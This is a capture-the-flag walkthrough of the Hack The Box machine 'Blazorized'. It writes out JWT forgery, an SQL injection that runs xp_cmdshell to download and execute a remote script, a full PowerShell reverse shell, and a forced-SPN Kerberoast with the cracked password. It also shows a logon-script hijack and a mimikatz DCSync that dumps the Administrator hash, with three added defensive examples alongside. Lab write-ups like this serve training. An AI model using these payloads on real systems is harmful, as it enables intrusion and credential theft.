HTB - Blazorized [Hard]
TCP Scan
> TARGET=10.129.81.3 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://blazorized.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-30 21:30:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ms-sql-ntlm-info:
| 10.129.81.3\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49776/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3:49776:
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
|_ TCP port: 49776
62648/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
echo '10.129.81.3 blazorized.htb' >> /etc/hosts
enum
- subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://blazorized.htb/" -H "Host: FUZZ.blazorized.htb" --hl 107
000000024: 200 27 L 67 W 2015 Ch "admin"
000000051: 404 0 L 0 W 0 Ch "api"
user: blazorized\nu_1055
- get
http://blazorized.htb/_framework/Blazorized.Shared.dll
- reverse to get jwt check code
- generate jwt
import jwt
from datetime import datetime, timedelta, timezone

# Symmetric signing key recovered from the JWT check code
# (the value itself has been removed from this page)
secret_key = "<REDACTED_SYMMETRIC_KEY>"

# JWT claims: .NET-style claim URIs, Super_Admin role, 72-hour expiry
claims = {
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": ["Super_Admin"],
    "exp": int((datetime.now(timezone.utc) + timedelta(hours=72)).timestamp()),  # expires 72 hours from now
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb",
}

# Sign the token with HS512 using the symmetric key
token = jwt.encode(claims, secret_key, algorithm="HS512")
print(token)

# JavaScript snippet to store the token in the browser's localStorage
print(f"localStorage.setItem('jwt', '{token}')")
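A defender-side counterpart to the script above (an added example, not code from the writeup): a strict HS512 verifier in stdlib Python next to a signer that reproduces what jwt.encode does. It shows that whoever holds the symmetric key can mint a Super_Admin token that passes every check, which is why the key must stay server-side, while tampering, alg "none" and a wrong iss/aud are rejected. The key value is constructed.

```python
import base64
import hashlib
import hmac
import json
import time

# Claim URI and iss/aud values are those the forged token above carries.
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
ISSUER = "http://api.blazorized.htb"
AUDIENCE = "http://admin.blazorized.htb"

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def hs512_sign(claims: dict, key: bytes) -> str:
    """Compact JWS with HS512, equivalent to jwt.encode(claims, key, algorithm="HS512").
    Anyone holding `key` can mint any claims (the writeup recovered it by reversing the DLL)."""
    header = b64url_encode(b'{"alg":"HS512","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha512).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"

def check_token(token: str, key: bytes, now=None):
    """Strict server-side verifier: returns (claims, None) or (None, reason). Pins the
    algorithm (never trusts alg from the token), compares the MAC in constant time, then enforces exp/iss/aud."""
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed"
    h, p, s = parts
    try:
        header, claims = json.loads(b64url_decode(h)), json.loads(b64url_decode(p))
        sig = b64url_decode(s)
    except ValueError:  # bad base64, bad UTF-8 and bad JSON all subclass ValueError
        return None, "malformed"
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None, "malformed"
    if header.get("alg") != "HS512":
        return None, "unexpected alg"
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha512).digest()
    if not hmac.compare_digest(expected, sig):
        return None, "bad signature"
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None, "expired"
    if claims.get("iss") != ISSUER or claims.get("aud") != AUDIENCE:
        return None, "wrong iss/aud"
    return claims, None

def is_super_admin(token: str, key: bytes, now=None) -> bool:
    claims, _ = check_token(token, key, now)
    return claims is not None and "Super_Admin" in claims.get(ROLE_CLAIM, [])
```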
- sqli at
http://admin.blazorized.htb/check-duplicate-post-title
'; IF (SELECT CONVERT(INT, value_in_use) FROM sys.configurations WHERE name = 'xp_cmdshell') = 1 EXEC master.dbo.xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.65/rev.ps1'')" --
- reverse shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.65",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- listener
# rlwrap nc -vnlp 4444
PS C:\Windows\system32> whoami
blazorized\nu_1055
PS C:\users\NU_1055\desktop> type user.txt
c8d921959eabcd0ed42d61ae114e36b3
user
wget http://10.10.14.65/PowerView.ps1 -O PowerView.ps1
import-module .\PowerView.ps1
> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
> Get-DomainSPNTicket -SPN nonexistent/BLAHBLAH
SamAccountName : UNKNOWN
DistinguishedName : UNKNOWN
ServicePrincipalName : nonexistent/BLAHBLAH
TicketByteHexStream :
Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$35549301BCB804D824B46FD05FE9A212$9FBCCA4457D7
- crack ticket
john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:06 DONE (2024-07-01 10:38) 0.1663g/s 2382Kp/s 2382Kc/s 2382KC/s (aleha)*eslomaXimo..(Cahir!!!)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- login
> evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
user:SSA_6010
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/assign-logon-script-profile-local-user The note above explains how to set scriptPath: it must be relative to the NETLOGON path, so first find where NETLOGON is on the system. Then check the permissions of the directories and find one where you have write privileges. Finally, paste the payload (I used a payload from revshells.com, more specifically the PowerShell base64 one) into a file there (I've tested with an existing file and with a new file ending in .bat; both worked, .ps1 didn't work for some reason) and change the scriptPath of the SSA_6010 user. P.S.: Don't try to add your payload to the original file; for some reason it doesn't work, even when you have write permissions there...
> wget http://10.10.14.65/startup.bat -O C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\startup.bat
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 | set-aduser -scriptpath "A32FF3AEAA23\startup.bat"
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 -properties scriptpath
DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled : True
GivenName :
Name : SSA_6010
ObjectClass : user
ObjectGUID : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName : SSA_6010
ScriptPath : A32FF3AEAA23\startup.bat
SID : S-1-5-21-2039403211-964143010-2924010611-1124
Surname :
UserPrincipalName : SSA_6010@blazorized.htb
- startup.bat
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.65/rev.ps1')
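An added detection example (mine, not part of the writeup) covering the forced-SPN Kerberoast and the logon-script change above: it triages constructed DC Security-log events for an SPN written onto another account (5136), an RC4 TGS request for that new SPN shortly after (4769, etype 0x17), and a scriptPath rewrite (5136). Field names follow the Windows event schema; the events, the 30-minute window and the rule names are assumptions of this example.

```python
from datetime import datetime, timedelta

# Constructed sample: DC Security-log events as a SIEM would ingest them (field names follow
# the Windows schema for 5136 object changes and 4769 TGS requests). They mirror the steps
# above: NU_1055 adds an SPN to RSA_4810 and requests an RC4 TGS for it; RSA_4810 later
# rewrites SSA_6010's scriptPath. Names and IPs are the ones that appear in this writeup.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2024-07-01T10:30:00", "SubjectUserName": "NU_1055",
     "ObjectDN": "CN=RSA_4810,CN=Users,DC=blazorized,DC=htb", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "nonexistent/BLAHBLAH"},
    {"EventID": 4769, "Time": "2024-07-01T10:30:20", "TargetUserName": "NU_1055@BLAZORIZED.HTB",
     "ServiceName": "RSA_4810", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.65"},
    {"EventID": 4769, "Time": "2024-07-01T10:31:00", "TargetUserName": "DC1$@BLAZORIZED.HTB",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.81.3"},
    {"EventID": 5136, "Time": "2024-07-01T11:05:00", "SubjectUserName": "RSA_4810",
     "ObjectDN": "CN=SSA_6010,CN=Users,DC=blazorized,DC=htb", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "scriptPath", "AttributeValue": "A32FF3AEAA23\\startup.bat"},
]

SPN_WINDOW = timedelta(minutes=30)   # an RC4 TGS this soon after an SPN write counts as "targeted"
OP_VALUE_ADDED = "%%14674"           # 5136 OperationType for "Value Added"

def object_name(dn):
    """'CN=RSA_4810,CN=Users,DC=...' -> 'RSA_4810'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def triage(events):
    """Return (rule, actor, detail) findings, oldest event first."""
    findings, spn_writes = [], {}          # spn_writes: target account -> time its SPN was added
    for ev in sorted(events, key=lambda e: e["Time"]):
        t = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 5136 and ev["OperationType"] == OP_VALUE_ADDED:
            actor, target = ev["SubjectUserName"], object_name(ev["ObjectDN"])
            attr, value = ev["AttributeLDAPDisplayName"], ev["AttributeValue"]
            if attr == "servicePrincipalName" and actor.upper() != target.upper():
                # An SPN added to someone else's account is the setup for a targeted Kerberoast
                spn_writes[target.upper()] = t
                findings.append(("spn_added_by_other_principal", actor, f"{target} <- {value}"))
            elif attr == "scriptPath":
                # A logon script runs as the victim at next logon; any change deserves a look
                findings.append(("logon_script_changed", actor, f"{target} -> {value}"))
        elif ev["EventID"] == 4769 and ev["TicketEncryptionType"] == "0x17":
            svc = ev["ServiceName"]
            if svc.endswith("$"):          # computer account; user SPNs are the roastable ones
                continue
            recent = spn_writes.get(svc.upper())
            rule = "targeted_kerberoast" if recent and t - recent <= SPN_WINDOW else "rc4_tgs_for_user_spn"
            findings.append((rule, ev["TargetUserName"], f"{svc} from {ev['IpAddress']}"))
    return findings

if __name__ == "__main__":
    for rule, actor, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:30} {actor:26} {detail}")
```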
root
PS C:\users\SSA_6010\documents> Get-ObjectAcl -DistinguishedName "dc=blazorized,dc=htb" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-512
AccessMask : 917949
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
cd C:\users\SSA_6010\documents
- use mimikatz
PS C:\users\SSA_6010\documents> .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator \krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /user:administrator \krbtgt
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 36ff197ab8f852956e4dcbbe85e38e17
* Primary:Kerberos-Newer-Keys *
Default Salt : BLAZORIZED.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
aes128_hmac (4096) : df4dbea7fcf2ef56722a6741439a9f81
des_cbc_md5 (4096) : 310e2a0438583dce
OldCredentials
aes256_hmac (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
aes128_hmac (4096) : db4d9e0e5cd7022242f3e03642c135a6
des_cbc_md5 (4096) : 1c67ef730261a198
OlderCredentials
aes256_hmac (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
aes128_hmac (4096) : 2d9925ef94916523b24e43d1cb8396ee
des_cbc_md5 (4096) : 9b01158c8923ce68
* Primary:Kerberos *
Default Salt : BLAZORIZED.HTBAdministrator
Credentials
des_cbc_md5 : 310e2a0438583dce
OldCredentials
des_cbc_md5 : 1c67ef730261a198
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
mimikatz(commandline) # exit
Bye!
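An added audit example (mine, not the writeup's) for the Get-ObjectAcl query above and the DCSync it enabled: it parses PowerView's list-style ACE output and reports any principal holding DCSync-capable rights on the domain root that is not one of the default holders. The SAMPLE text and the expected-principal set are assumptions of this example; the domain SID and the -1124 RID are taken from the output on this page.

```python
import re

DOMAIN_SID = "S-1-5-21-2039403211-964143010-2924010611"   # from the output above
# Default holders: Domain Admins, Domain Controllers, Enterprise Admins, Enterprise DCs, Administrators, SYSTEM
EXPECTED = {DOMAIN_SID + "-512", DOMAIN_SID + "-516", DOMAIN_SID + "-519",
            "S-1-5-9", "S-1-5-32-544", "S-1-5-18"}
REPLICATION = re.compile(r"DS-Replication-Get-Changes", re.I)   # names PowerView resolves the GUIDs to
SELF_GRANTING = re.compile(r"\b(GenericAll|WriteDacl|WriteOwner)\b")

# Constructed sample: the Domain Admins ACE from the output above, plus an ACE that a direct
# replication grant to SSA_6010 (SID ...-1124 on this box) would produce.
SAMPLE = """\
AceType               : AccessAllowed
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
SecurityIdentifier    : S-1-5-21-2039403211-964143010-2924010611-512
AceQualifier          : AccessAllowed
AceType               : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectType            : DS-Replication-Get-Changes-All
SecurityIdentifier    : S-1-5-21-2039403211-964143010-2924010611-1124
AceQualifier          : AccessAllowed
"""

def parse_aces(text):
    """One dict per ACE; PowerView's list output starts a new record at each 'AceType' line."""
    records = []
    for key, value in re.findall(r"^\s*(\w+)\s*:\s*(.*?)\s*$", text, re.M):
        if key == "AceType":
            records.append({})
        if records:
            records[-1][key] = value
    return records

def dcsync_reason(ace):
    """Why this ACE lets its holder DCSync (directly, or by granting itself the right); else None."""
    rights = ace.get("ActiveDirectoryRights", "")
    obj_type = ace.get("ObjectAceType") or ace.get("ObjectType") or ""
    if REPLICATION.search(obj_type):
        return "holds " + obj_type
    if "ExtendedRight" in rights and not obj_type:   # no ObjectType means every extended right
        return "holds all extended rights"
    m = SELF_GRANTING.search(rights)
    return f"can grant itself the right via {m.group(1)}" if m else None

def audit_domain_root(text):
    """(sid, reason) for each allow ACE whose grantee is not a default holder of these rights."""
    findings = []
    for ace in parse_aces(text):
        if ace.get("AceQualifier") != "AccessAllowed":
            continue
        reason, sid = dcsync_reason(ace), ace.get("SecurityIdentifier", "")
        if reason and sid not in EXPECTED:
            findings.append((sid, reason))
    return findings
```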
- login
┌──(root㉿kali)-[~/workspace/Blazorized]
└─# evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2024 3:42 PM 159 note.txt
-ar--- 6/30/2024 7:33 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
996613cb46967be90e154649068d4465
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack